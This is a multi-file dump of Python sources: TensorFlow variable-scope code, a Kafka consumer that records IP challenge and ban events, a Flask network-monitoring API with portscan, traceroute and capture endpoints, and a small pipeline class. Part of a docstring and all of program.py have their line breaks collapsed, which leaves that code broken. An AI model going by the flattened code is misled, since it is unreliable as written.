            constraint=self._constraint)
        try:
          entered_pure_variable_scope = pure_variable_scope.__enter__()
        except:
          pure_variable_scope.__exit__(*sys.exc_info())
          raise
        self._cached_pure_variable_scope = pure_variable_scope
        return entered_pure_variable_scope

    else:  # Here name_or_scope is None. Using default name, but made unique.
      if self._reuse:
        raise ValueError("reuse=True cannot be used without a name_or_scope")
      current_name_scope = current_name_scope or ops.name_scope(
          self._default_name)
      try:
        current_name_scope_name = current_name_scope.__enter__()
      except:
        current_name_scope.__exit__(*sys.exc_info())
        raise
      self._current_name_scope = current_name_scope
      unique_default_name = _get_unique_variable_scope(self._default_name)
      pure_variable_scope = _pure_variable_scope(
          unique_default_name,
          initializer=self._initializer,
          regularizer=self._regularizer,
          caching_device=self._caching_device,
          partitioner=self._partitioner,
          custom_getter=self._custom_getter,
          old_name_scope=current_name_scope_name,
          dtype=self._dtype,
          use_resource=self._use_resource,
          constraint=self._constraint)
      try:
        entered_pure_variable_scope = pure_variable_scope.__enter__()
      except:
        pure_variable_scope.__exit__(*sys.exc_info())
        raise
      self._cached_pure_variable_scope = pure_variable_scope
      return entered_pure_variable_scope

  def __exit__(self, type_arg, value_arg, traceback_arg):
    # Unwind in reverse order of __enter__: pure variable scope, then the
    # auxiliary name scope, then the graph context (graph mode only).
    self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
                                              traceback_arg)
    if self._current_name_scope:
      self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
    if self._in_graph_mode and not self._building_function:
      self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)


# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
                      name_or_scope,
                      default_name=None,
                      initializer=None,
                      regularizer=None,
                      caching_device=None,
                      partitioner=None,
                      custom_getter=None,
                      reuse=None,
                      dtype=None,
                      use_resource=None,
                      constraint=None):
  """Deprecated: context manager for defining an op that creates variables."""
  # Deprecated alias: forwards everything to `variable_scope` with the
  # argument order changed, after emitting a deprecation warning.
  logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
               " use tf.variable_scope(name, default_name, values)")
  with variable_scope(
      name_or_scope,
      default_name=default_name,
      values=values,
      initializer=initializer,
      regularizer=regularizer,
      caching_device=caching_device,
      partitioner=partitioner,
      custom_getter=custom_getter,
      reuse=reuse,
      dtype=dtype,
      use_resource=use_resource,
      constraint=constraint) as scope:
    yield scope


def _compute_slice_dim_and_shape(full_shape, slicing):
  """Computes which dimension is being sliced and the typical slice shape."""
  # `slicing` gives the number of slices per dimension; exactly one entry may
  # be > 1 (single-axis partitioning).  The returned slice_shape holds the
  # size of a typical (non-last) slice; any remainder is added to the last
  # slice by the caller.
  slice_shape = [0] * len(full_shape)
  slice_dim = None
  for dim, num_slices in enumerate(slicing):
    dim_size = full_shape[dim]
    if num_slices <= 0 or dim_size < num_slices:
      raise ValueError("Cannot create %d slices for size %d. shape: %s, "
                       "slicing: %s" % (num_slices, full_shape[dim],
                                        full_shape, slicing))
    if num_slices == 1:
      # Not slicing in this dimension.
      slice_shape[dim] = dim_size
    elif slice_dim is not None:
      # We only support slicing along one of the dimensions.
      raise ValueError("Can only slice a variable along one dimension: "
                       "shape: %s, slicing: %s" % (full_shape, slicing))
    else:
      # Note: We will add any extras onto the last slice, later.
      slice_dim = dim
      slice_shape[dim] = dim_size // num_slices

  # Degenerate case: If "slicing" was all ones, pretend we are slicing along
  # the first dimension.
  if slice_dim is None:
    slice_dim = 0
  return slice_dim, slice_shape


def _get_trainable_value(synchronization, trainable):
  """Computes the trainable value based on the given arguments."""
  # ON_READ-synchronized variables must never be trainable; `trainable=None`
  # defaults to True otherwise.
  if synchronization == VariableSynchronization.ON_READ:
    if trainable:
      raise ValueError(
          "Synchronization value can be set to "
          "VariableSynchronization.ON_READ only for non-trainable variables. "
          "You have specified trainable=True and "
          "synchronization=VariableSynchronization.ON_READ.")
    else:
      # Set trainable to be false when variable is to be synced on read.
      trainable = False
  elif trainable is None:
    trainable = True
  return trainable


def default_variable_creator(next_creator=None, **kwargs):
  """Default variable creator."""
  # Terminal creator in the creator-scope chain: there must be no further
  # creator to delegate to.
  assert next_creator is None
  initial_value = kwargs.get("initial_value", None)
  trainable = kwargs.get("trainable", None)
  collections = kwargs.get("collections", None)
  validate_shape = kwargs.get("validate_shape", True)
  caching_device = kwargs.get("caching_device", None)
  name = kwargs.get("name", None)
  variable_def = kwargs.get("variable_def", None)
  dtype = kwargs.get("dtype", None)
  expected_shape = kwargs.get("expected_shape", None)
  import_scope = kwargs.get("import_scope", None)
  constraint = kwargs.get("constraint", None)
  use_resource = kwargs.get("use_resource", None)

  # Set trainable value based on synchronization value.
  synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
  trainable = _get_trainable_value(
      synchronization=synchronization, trainable=trainable)

  # Resolve use_resource: explicit kwarg > enclosing variable scope >
  # module default; eager execution always forces resource variables.
  if use_resource is None:
    use_resource = get_variable_scope().use_resource
  if use_resource is None:
    use_resource = _DEFAULT_USE_RESOURCE
  use_resource = use_resource or context.executing_eagerly()
  if use_resource:
    return resource_variable_ops.ResourceVariable(
        initial_value=initial_value,
        trainable=trainable,
        collections=collections,
        validate_shape=validate_shape,
        caching_device=caching_device,
        name=name,
        dtype=dtype,
        constraint=constraint,
        variable_def=variable_def,
        import_scope=import_scope)
  else:
    return variables.RefVariable(
        initial_value=initial_value,
        trainable=trainable,
        collections=collections,
        validate_shape=validate_shape,
        caching_device=caching_device,
        name=name,
        dtype=dtype,
        constraint=constraint,
        variable_def=variable_def,
        expected_shape=expected_shape,
        import_scope=import_scope)


def default_variable_creator_v2(next_creator=None, **kwargs):
  """Default variable creator."""
  # V2 terminal creator: always produces a ResourceVariable (no collections /
  # expected_shape / use_resource plumbing as in the v1 creator above).
  assert next_creator is None
  initial_value = kwargs.get("initial_value", None)
  trainable = kwargs.get("trainable", None)
  validate_shape = kwargs.get("validate_shape", True)
  caching_device = kwargs.get("caching_device", None)
  name = kwargs.get("name", None)
  variable_def = kwargs.get("variable_def", None)
  dtype = kwargs.get("dtype", None)
  import_scope = kwargs.get("import_scope", None)
  constraint = kwargs.get("constraint", None)

  # Set trainable value based on synchronization value.
  synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
  trainable = _get_trainable_value(
      synchronization=synchronization, trainable=trainable)

  return resource_variable_ops.ResourceVariable(
      initial_value=initial_value,
      trainable=trainable,
      validate_shape=validate_shape,
      caching_device=caching_device,
      name=name,
      dtype=dtype,
      constraint=constraint,
      variable_def=variable_def,
      import_scope=import_scope)


# Install the creators above as the terminal creators used by the
# `variables` module.
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2


def _make_getter(captured_getter, captured_previous):
  """Gets around capturing loop variables in python being broken."""
  # Returns a closure binding the two arguments eagerly (avoids the
  # late-binding pitfall if this were a lambda in a loop).
  return lambda **kwargs: captured_getter(captured_previous, **kwargs)


# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1


@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
  """Scope which defines a variable creation function to be used by variable().

  variable_creator is expected to be a function with the following signature:

  ```
    def variable_creator(next_creator, **kwargs)
  ```

  The creator is supposed to eventually call the next_creator to create a
  variable if it does want to create a variable and not call Variable or
  ResourceVariable directly. This helps make creators composable. A creator
  may choose to create multiple variables, return already existing variables,
  or simply register that a variable was created and defer to the next
  creators in line. Creators can also modify the keyword arguments seen by
  the next creators.

  Custom getters in the variable scope will eventually resolve down to these
  custom creators when they do create variables.

  The valid keyword arguments in kwds are:
      initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
        which is the initial value for the Variable. The initial value must
        have a shape specified unless `validate_shape` is set to False. Can
        also be a callable with no argument that returns the initial value
        when called. In that case, `dtype` must be specified. (Note that
        initializer functions from init_ops.py must first be bound to a
        shape before being used here.)
      trainable: If `True`, the default, also adds the variable to the graph
        collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used
        as the default list of variables to use by the `Optimizer` classes.
        `trainable` defaults to `True` unless `synchronization` is set to
        `ON_READ`.
      collections: List of graph collections keys. The new variable is added
        to these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
      validate_shape: If `False`, allows the variable to be initialized with
        a value of unknown shape. If `True`, the default, the shape of
        `initial_value` must be known.
      caching_device: Optional device string describing where the Variable
        should be cached for reading. Defaults to the Variable's device. If
        not `None`, caches on another device. Typical use is to cache on the
        device where the Ops using the Variable reside, to deduplicate
        copying through `Switch` and other conditional statements.
      name: Optional name for the variable. Defaults to `'Variable'` and gets
        uniquified automatically.
      dtype: If set, initial_value will be converted to the given type. If
        `None`, either the datatype will be kept (if `initial_value` is a
        Tensor), or `convert_to_tensor` will decide.
      constraint: A constraint function to be applied to the variable after
        updates by some algorithms.
      use_resource: if True, a ResourceVariable is always created.
      synchronization: Indicates when a distributed variable will be
        aggregated. Accepted values are constants defined in the class
        `tf.VariableSynchronization`. By default the synchronization is set
        to `AUTO` and the current `DistributionStrategy` chooses when to
        synchronize. If `synchronization` is set to `ON_READ`, `trainable`
        must not be set to `True`.
      aggregation: Indicates how a distributed variable will be aggregated.
        Accepted values are constants defined in the class
        `tf.VariableAggregation`.

  This set may grow over time, so it's important the signature of creators
  is as mentioned above.

  Args:
    variable_creator: the passed creator

  Yields:
    A scope in which the creator is active
  """
  with ops.get_default_graph()._variable_creator_scope(variable_creator):  # pylint: disable=protected-access
    yield


# Note: only the docstrings differ between this and v1.
@tf_export(v2=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
  """Scope which defines a variable creation function to be used by variable().

  variable_creator is expected to be a function with the following signature:

  ```
    def variable_creator(next_creator, **kwargs)
  ```

  The creator is supposed to eventually call the next_creator to create a
  variable if it does want to create a variable and not call Variable or
  ResourceVariable directly. This helps make creators composable. A creator
  may choose to create multiple variables, return already existing variables,
  or simply register that a variable was created and defer to the next
  creators in line. Creators can also modify the keyword arguments seen by
  the next creators.

  Custom getters in the variable scope will eventually resolve down to these
  custom creators when they do create variables.

  The valid keyword arguments in kwds are:
      initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
        which is the initial value for the Variable. The initial value must
        have a shape specified unless `validate_shape` is set to False. Can
        also be a callable with no argument that returns the initial value
        when called. In that case, `dtype` must be specified. (Note that
        initializer functions from init_ops.py must first be bound to a
        shape before being used here.)
      trainable: If `True`, the default, GradientTapes automatically watch
        uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a value of unknown shape. If `True`, the default, the shape of `initial_value` must be known. caching_device: Optional device string describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the Variable reside, to deduplicate copying through `Switch` and other conditional statements. name: Optional name for the variable. Defaults to `'Variable'` and gets uniquified automatically. dtype: If set, initial_value will be converted to the given type. If `None`, either the datatype will be kept (if `initial_value` is a Tensor), or `convert_to_tensor` will decide. constraint: A constraint function to be applied to the variable after updates by some algorithms. synchronization: Indicates when a distributed a variable will be aggregated. Accepted values are constants defined in the class `tf.VariableSynchronization`. By default the synchronization is set to `AUTO` and the current `DistributionStrategy` chooses when to synchronize. If `synchronization` is set to `ON_READ`, `trainable` must not be set to `True`. aggregation: Indicates how a distributed variable will be aggregated. Accepted values are constants defined in the class `tf.VariableAggregation`. This set may grow over time, so it's important the signature of creators is as mentioned above. Args: variable_creator: the passed creator Yields: A scope in which the creator is active """ with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access yield
banjax_report_consumer.py
import datetime
import threading
import json
from kafka import KafkaConsumer, KafkaProducer
import time
import logging
import sys
import types
from baskerville.db import set_up_db
from baskerville.models.config import KafkaConfig
from baskerville.models.ip_cache import IPCache
from baskerville.util.elastic_writer import ElasticWriter
from baskerville.util.helpers import parse_config
import argparse
import os
from baskerville import src_dir


class BanjaxReportConsumer(object):
    """Consume Banjax edge reports from Kafka and persist their outcomes.

    Handles two families of messages: periodic 'status' metric bundles, and
    per-IP challenge events (failed / passed / banned) which are reflected in
    the request_sets table (and optionally Elasticsearch).
    """

    # Metric keys that may appear in a 'status' message. __init__ installs a
    # pass-through consume_<field> handler for each of them.
    status_message_fields = [
        "timestamp",
        "restart_time",
        "reload_time",
        "num_of_challenges",
        "num_of_host_challenges",
        "num_of_ip_challenges",
        "swabber_ip_db_size",
        "regex_manager_ip_db_size",
        "challenger_ip_db_size",
        "proxy.process.traffic_server.memory.rss",
        "proxy.node.cache.contents.num_docs",
        "proxy.process.cache.bytes_total",
        "proxy.process.cache.percent_full",
        "proxy.process.cache.ram_cache.bytes_used",
        "proxy.process.cache.ram_cache.total_bytes",
        "proxy.process.net.connections_currently_open",
        "proxy.process.current_server_connections",
        "proxy.process.http.current_active_client_connections",
        "proxy.process.eventloop.time.max"
    ]

    def __init__(self, config, logger):
        """Set up DB session, IP cache and (optional) Elastic writer.

        :param config: baskerville config object (kafka/database/elastic/engine)
        :param logger: standard logging.Logger
        """
        self.config = config
        self.kafka_config = config.kafka
        self.logger = logger
        self.ip_cache = IPCache(config, self.logger)
        self.session, self.engine = set_up_db(config.database.__dict__)

        if config.elastic:
            self.elastic_writer = ElasticWriter(host=config.elastic.host,
                                                port=config.elastic.port,
                                                user=config.elastic.user,
                                                password=config.elastic.password)
        else:
            self.elastic_writer = None

        # XXX i think the metrics registry swizzling code is passing
        # an extra argument here mistakenly?.?.
        def _tmp_fun(_, _2, message):
            return message

        for field_name in self.__class__.status_message_fields:
            setattr(self, f"consume_{field_name}", types.MethodType(_tmp_fun, self))

    def run(self):
        """Blocking consume loop over the banjax report topic."""
        consumer = KafkaConsumer(
            self.kafka_config.banjax_report_topic,
            group_id=None,
            **self.config.kafka.connection
        )
        for message in consumer:
            self.consume_message(message)
        consumer.close()

    def consume_message(self, message):
        """Decode one Kafka record and dispatch it by its 'name' field."""
        if len(message.value) == 0:
            return
        try:
            s = message.value.decode("utf-8")
        except UnicodeDecodeError:
            self.logger.info("got bad utf-8 over the kafka channel")
            # BUGFIX: previously fell through and raised NameError on 's'
            return
        try:
            d = json.loads(s)
        except json.JSONDecodeError:
            self.logger.info(f"got bad json over the kafka channel: {s}")
            # BUGFIX: previously fell through and raised NameError on 'd'
            return

        # 'status'-type messages contain several metrics and are reported per $interval
        if d.get("name") == "status":
            edge_id = d.get("id")
            for k in d:  # only the keys are needed here
                if k == 'name' or k == 'id':
                    continue
                try:
                    f = getattr(self, f"consume_{k}")
                    f(self, d)
                except AttributeError:
                    self.logger.info(f"did not process banjax status {k} from edge {edge_id}")
        # 'ip_failed_challenge'-type messages are reported when a challenge is failed
        elif d.get("name") == "ip_failed_challenge":
            self.consume_ip_failed_challenge_message(d)
        elif d.get("name") == "ip_passed_challenge" or d.get("name") == "ip_passed_challenge2":
            self.consume_ip_passed_challenge_message(d)
        elif d.get("name") == "ip_banned":
            self.consume_ip_banned_message(d)

    def get_time_filter(self):
        """Return the UTC cutoff timestamp string for request_sets updates."""
        return (datetime.datetime.utcnow() - datetime.timedelta(
            minutes=self.config.engine.banjax_sql_update_filter_minutes)).strftime("%Y-%m-%d %H:%M:%S.000Z")

    def consume_ip_failed_challenge_message(self, message):
        """Record a failed challenge; ban the IP once it hits the fail limit."""
        ip = message['value_ip']
        num_fails = self.ip_cache.ip_failed_challenge(ip)
        if num_fails == 0:
            return message
        try:
            # Use bound parameters instead of f-string interpolation: 'ip'
            # comes from an untrusted Kafka message (SQL-injection hardening).
            if num_fails >= self.config.engine.banjax_num_fails_to_ban:
                self.ip_cache.ip_banned(ip)
                sql = ('update request_sets set banned = 1 where '
                       'stop > :stop and challenged = 1 and ip = :ip')
                params = {'stop': self.get_time_filter(), 'ip': ip}
            else:
                sql = ('update request_sets set challenge_failed = :fails where '
                       'stop > :stop and challenged = 1 and ip = :ip')
                params = {'fails': num_fails, 'stop': self.get_time_filter(), 'ip': ip}
            self.session.execute(sql, params)
            self.session.commit()
        except Exception:
            self.session.rollback()
            # BUGFIX: logger.error(Exception) logged the exception *class*;
            # logger.exception records the actual traceback.
            self.logger.exception(f'failed to record failed challenge for ip {ip}')
            raise
        return message

    def consume_ip_passed_challenge_message(self, message):
        """Record a passed challenge in the DB (and Elastic, if configured)."""
        ip = message['value_ip']
        host = message['value_site']
        processed = self.ip_cache.ip_passed_challenge(ip)
        if not processed:
            return message
        try:
            if self.elastic_writer:
                with self.elastic_writer as writer:
                    writer.write_challenge_passed(ip, host)
            sql = ('update request_sets set challenge_passed = 1 where '
                   'stop > :stop and challenged = 1 and ip = :ip')
            self.session.execute(sql, {'stop': self.get_time_filter(), 'ip': ip})
            self.session.commit()
        except Exception:
            self.session.rollback()
            self.logger.exception(f'failed to record passed challenge for ip {ip}')
            raise
        return message

    def consume_ip_banned_message(self, message):
        """Mark the reported IP as banned in request_sets."""
        ip = message['value_ip']
        self.logger.info(f'Banjax ip_banned {ip} ...')
        try:
            sql = ('update request_sets set banned = 1 where '
                   'stop > :stop and challenged = 1 and ip = :ip')
            self.session.execute(sql, {'stop': self.get_time_filter(), 'ip': ip})
            self.session.commit()
        except Exception:
            self.session.rollback()
            self.logger.exception(f'failed to record ban for ip {ip}')
            raise
        return message


class ChallengeProducer(object):
    """Test helper that periodically sends 'challenge_host' Kafka commands."""

    def __init__(self, config, logger):
        self.config = config
        self.logger = logger

    def run(self):
        """Send batches of ten synthetic challenge commands, one batch per second."""
        producer = KafkaProducer(**self.config.kafka.connection)
        number = 0
        while True:
            for _ in range(0, 10):
                domain = f"example-{number}.com:8080"
                command = {'name': 'challenge_host', 'value': domain}
                # NOTE(review): the consumer reads its topic from config.kafka;
                # confirm banjax_command_topic really lives on the top-level config.
                producer.send(self.config.banjax_command_topic,
                              json.dumps(command).encode('utf-8'))
                self.logger.info("sent a command")
                number = number + 1
            time.sleep(1)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--conf", action="store", dest="conf_file",
        default=os.path.join(src_dir, '..', 'conf', 'baskerville.yaml'),
        help="Path to config file"
    )
    parser.add_argument(
        "-c", "--consumer", dest="start_consumer",
        action="store_true",
        help="start consumer",
    )
    parser.add_argument(
        "-p", "--producer", dest="start_producer",
        action="store_true",
        help="start producer",  # BUGFIX: help text said "start consumer"
    )
    args = parser.parse_args()

    logging.basicConfig(stream=sys.stdout, level=logging.INFO)
    logger = logging.getLogger()
    config_dict = KafkaConfig(parse_config(path=args.conf_file)['kafka']).validate()

    if args.start_consumer:
        status_consumer = BanjaxReportConsumer(config_dict, logger)
        consumer_thread = threading.Thread(target=status_consumer.run)
        consumer_thread.start()
    if args.start_producer:
        challenge_producer = ChallengeProducer(config_dict, logger)
        producer_thread = threading.Thread(target=challenge_producer.run)
        producer_thread.start()

    if args.start_consumer:
        consumer_thread.join()
    if args.start_producer:
        producer_thread.join()
quokka_server.py
# Quokka REST server: a Flask + flask-restx API exposing host/device/service
# inventory and status history, plus on-demand portscan/traceroute/packet-
# capture jobs that are executed by separate workers and reported back via
# the /worker/* endpoints.
from flask import Flask, request
from flask_cors import CORS
from flask_restx import Api, Resource

from quokka_server_utils import get_hostname_from_target, get_ip_address_from_target
from DbHourlyTask import DbHourlyTask
from apidoc_models import ApiModels

import threading
import atexit

from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

quokka_app = Flask(__name__)
CORS(quokka_app)

api = Api(quokka_app,
          version="1.0",
          title="Quokka",
          description="Quokka for 52-weeks-of-python",
          default="quokka",
          default_label="")

ApiModels.set_api_models(api)

# NOTE(review): these imports deliberately happen after the app/api are
# created — presumably db_apis/worker_apis need them at import time; confirm
# before reordering.
from db_apis import get_all_hosts, set_host, get_host, get_host_status, get_host_status_summary
from db_apis import get_all_devices, set_device, get_device, get_device_status, get_device_status_summary
from db_apis import get_all_services, set_service, get_service, get_service_status, get_service_status_summary
from db_apis import get_capture, get_portscan, get_traceroute
from db_apis import record_portscan_data, record_traceroute_data, record_capture_data
from worker_apis import start_portscan, start_traceroute, start_capture

limiter = Limiter(quokka_app, key_func=get_remote_address)

# Start background DB hourly task
db_hourly_task = DbHourlyTask()
db_hourly_task_thread = threading.Thread(target=db_hourly_task.start)
db_hourly_task_thread.start()


# shutdown of our flask process requires terminating background db thread
def shutdown():
    db_hourly_task.set_terminate()
    db_hourly_task_thread.join()


atexit.register(shutdown)  # causes shutdown() to get called when exiting


@api.route("/hosts")
class HostsEndpoint(Resource):
    """List all hosts (GET) or add/update one host (PUT ?hostname=...)."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.response(200, 'Success', ApiModels.hosts_response)
    def get():
        return get_all_hosts()

    @staticmethod
    @api.doc(params={"hostname": "Hostname of host to add or update"},
             body=ApiModels.host_fields)
    @api.response(204, 'Success')
    @api.response(400, 'Must provide hostname to add/update host')
    def put():
        hostname = request.args.get("hostname")
        if not hostname:
            return "Must provide hostname to add/update host", 400
        # Host attributes come from the JSON request body.
        host = request.get_json()
        set_host(host)
        return {}, 204


@api.route("/devices")
class DevicesEndpoint(Resource):
    """List all devices (GET) or add/update one device (PUT ?name=...)."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.response(200, 'Success', ApiModels.devices_response)
    def get():
        return get_all_devices()

    @staticmethod
    @api.doc(params={"name": "Name of device to add or update"},
             body=ApiModels.device_fields)
    @api.response(204, 'Success')
    @api.response(400, 'Must provide device name to add/update service')
    def put():
        name = request.args.get("name")
        if not name:
            return "Must provide device name to add/update device", 400
        device = request.get_json()
        set_device(device)
        return {}, 204


@api.route("/services")
class ServicesEndpoint(Resource):
    """List all services (GET) or add/update one service (PUT ?name=...)."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.response(200, 'Success', [ApiModels.services_response])
    def get():
        return get_all_services()

    @staticmethod
    @api.doc(params={"name": "Name of service to add or update"},
             body=ApiModels.service_fields)
    @api.response(204, 'Success')
    @api.response(400, 'Must provide service name to add/update service')
    def put():
        name = request.args.get("name")
        if not name:
            return "Must provide service name to add/update service", 400
        service = request.get_json()
        set_service(service)
        return {}, 204


@api.route("/scan")
class ScanEndpoint(Resource):
    """Start a portscan (POST, returns a token) and fetch its result (GET)."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(params={"token": "The token returned from the corresponding POST that initiated the portscan",
                     "target": "The target for the portscan request"})
    @api.response(200, 'Success', ApiModels.portscan_data)
    @api.response(400, "Must provide token and target to get portscan")
    def get():
        target = request.args.get("target")
        if not target:
            return "Must provide target to get portscan", 400
        token = request.args.get("token")
        if not token:
            return "Must provide token to get portscan", 400
        return get_portscan(target, token)

    @staticmethod
    @api.doc(params={"target": "IP address or hostname of target host or device to scan"})
    @api.response(200, 'Success', ApiModels.token_response)
    @api.response(400, 'Must provide target to get portscan')
    def post():
        target = request.args.get("target")
        if not target:
            return "Must provide target to initiate portscan", 400
        # The worker runs asynchronously; the token is used to poll via GET.
        token = start_portscan(target)
        return {"token": token}


@api.route("/worker/portscan")
class WorkerScanEndpoint(Resource):
    """Callback endpoint for workers to report completed portscan results."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(body=ApiModels.portscan_data)
    @api.response(204, 'Success')
    def post():
        portscan_data = request.get_json()
        record_portscan_data(portscan_data)
        return {}, 204


@api.route("/traceroute")
class TracerouteEndpoint(Resource):
    """Start a traceroute (POST, returns a token) and fetch its result (GET)."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(params={"token": "The token returned from the corresponding POST that initiated the traceroute",
                     "target": "The target for the traceroute request"})
    @api.response(400, "Must provide token and target to get traceroute")
    @api.response(200, 'Success', ApiModels.traceroute_data)
    def get():
        target = request.args.get("target")
        if not target:
            return "Must provide service target to get traceroute", 400
        # Traceroute results are keyed by hostname, not by the raw target.
        hostname = get_hostname_from_target(target)
        token = request.args.get("token")
        if not token:
            return "Must provide token to get traceroute", 400
        return get_traceroute(hostname, token)

    @staticmethod
    @api.doc(params={"target": "IP address or hostname of target service, host, or device to find traceroute for"})
    @api.response(200, 'Success', ApiModels.token_response)
    @api.response(400, 'Must provide target to initiate traceroute')
    def post():
        target = request.args.get("target")
        if not target:
            return "Must provide target to get traceroute", 400
        hostname = get_hostname_from_target(target)
        token = start_traceroute(hostname)
        return {"token": token}


@api.route("/worker/traceroute")
class WorkerTracerouteEndpoint(Resource):
    """Callback endpoint for workers to report completed traceroute results."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(body=ApiModels.traceroute_data)
    @api.response(204, 'Success')
    def post():
        traceroute_data = request.get_json()
        record_traceroute_data(traceroute_data)
        return {}, 204


@api.route("/capture")
class CaptureEndpoint(Resource):
    """Fetch captured packets (GET) or start a packet capture (POST)."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(params={"ip": "The ip address for which to capture packets",
                     "protocol": "The protocol for which to capture packets",
                     "port": "The port for which to capture packets",
                     "num_packets": "The number of packets to retrieve"})
    @api.response(200, 'Success', ApiModels.capture_data)
    def get():
        ip = request.args.get("ip")
        protocol = request.args.get("protocol")
        port = request.args.get("port")
        num_packets = request.args.get("num_packets")

        if ip:
            ip = get_ip_address_from_target(ip)
        # Defaults: 10 packets; non-numeric port is ignored.
        if not num_packets or not num_packets.isnumeric():
            num_packets = 10
        if port and port.isnumeric():
            port = int(port)
        else:
            port = None

        return {"packets": get_capture(ip, protocol, port, int(num_packets))}

    @staticmethod
    @api.doc(params={"ip": "The ip address for which to capture packets",
                     "protocol": "The protocol for which to capture packets",
                     "port": "The port for which to capture packets",
                     "capture_time": "The time to capture packets"})
    @api.response(200, 'Capture initiated')
    def post():
        ip = request.args.get("ip")
        protocol = request.args.get("protocol")
        port = request.args.get("port")
        capture_time = request.args.get("capture_time")

        if ip:
            ip = get_ip_address_from_target(ip)
        # NOTE(review): a non-numeric capture_time raises ValueError here
        # (no isnumeric() guard as in GET above) — consider validating.
        if not capture_time:
            capture_time = 180
        else:
            capture_time = int(capture_time)

        start_capture(ip, protocol, port, capture_time)
        return "Capture initiated", 200


@api.route("/worker/capture")
class WorkerCaptureEndpoint(Resource):
    """Callback endpoint for workers to report captured packets.

    NOTE(review): unlike the other endpoints this one has no rate limiter —
    confirm that is intentional.
    """

    @staticmethod
    @api.doc(body=ApiModels.capture_data)
    @api.response(204, 'Success')
    def post():
        capture_data = request.get_json()
        record_capture_data(capture_data)
        return {}, 204


@api.route("/host/status")
class HostStatusEndpoint(Resource):
    """Return a host record plus its recent status datapoints and summary."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(params={"hostname": "Hostname of host to get status for",
                     "datapoints": "Number of datapoints to be returned"})
    @api.response(200, 'Success')
    @api.response(400, 'Must provide hostname to get host status')
    def get():
        hostname = request.args.get("hostname")
        datapoints = request.args.get("datapoints")
        if not hostname:
            return "Must provide hostname to get host status", 400
        if not datapoints:
            datapoints = "24"  # default: last 24 datapoints
        if not datapoints.isnumeric():
            return "Datapoints must be an integer", 400

        host = get_host(hostname)
        if not host:
            return f"Unknown host: {hostname}", 400

        host_status = {"host": host,
                       "status": get_host_status(hostname, int(datapoints)),
                       "summary": get_host_status_summary(hostname, int(datapoints))}
        return host_status, 200


@api.route("/service/status")
class ServiceStatusEndpoint(Resource):
    """Return a service record plus its recent status datapoints and summary."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(params={"name": "Name of service to get status for",
                     "datapoints": "Number of datapoints to be returned"})
    @api.response(200, 'Success')
    @api.response(400, 'Must provide name to get service status')
    def get():
        name = request.args.get("name")
        datapoints = request.args.get("datapoints")
        if not name:
            return "Must provide name to get service status", 400
        if not datapoints:
            datapoints = "24"
        if not datapoints.isnumeric():
            return "Datapoints must be an integer", 400

        service = get_service(name)
        if not service:
            return f"Unknown service: {name}", 400

        service_status = {"service": service,
                          "status": get_service_status(name, int(datapoints)),
                          "summary": get_service_status_summary(name, int(datapoints))}
        return service_status, 200


@api.route("/device/status")
class DeviceStatusEndpoint(Resource):
    """Return a device record plus its recent status datapoints and summary."""

    decorators = [limiter.limit("120/minute")]

    @staticmethod
    @api.doc(params={"name": "Name of device to get status for",
                     "datapoints": "Number of datapoints to be returned"})
    @api.response(200, 'Success')
    @api.response(400, 'Must provide name to get device status')
    def get():
        name = request.args.get("name")
        datapoints = request.args.get("datapoints")
        if not name:
            return "Must provide name to get device status", 400
        if not datapoints:
            datapoints = "24"
        if not datapoints.isnumeric():
            return "Datapoints must be an integer", 400

        device = get_device(name)
        if not device:
            return f"Unknown device: {name}", 400

        device_status = {"device": device,
                         "status": get_device_status(name, int(datapoints)),
                         "summary": get_device_status_summary(name, int(datapoints))}
        return device_status, 200
program.py
import logging import queue import threading from uuid import UUID, uuid4 from opsi.webserver.schema import NodeTreeN from .manager import Manager from .pipeline import Node, Pipeline LOGGER = logging.getLogger(__name__) class Program: def __init__(self, lifespan): self.queue = queue.Queue() self.lifespan = lifespan self.pipeline = Pipeline(self) self.manager = Manager(self.pipeline) self.p_thread = None def create_node(self, func_type: str, uuid: UUID = None) -> Node: if uuid is None: uuid = uuid4() try: func = self.manager.funcs[func_type] except KeyError: raise ValueError(f"Function {func_type} not found") return self.pipeline.create_node(func, uuid) def mainloop(self, shutdown): self.shutdown = shutdown self.p_thread = threading.Thread(target=self.pipeline.mainloop) self.p_thread.name = "Pipeline Mainloop" self.p_thread.daemon = True self.p_thread.start() while not self.shutdown.is_set(): task = self.queue.get() # todo: blocking & timeout? task.run() # won't send exceptions because runs in seperate thead LOGGER.info("Program main loop is shutting down...") self.pipeline.clear() self.shutdown.clear()
raspberry_lamp.py
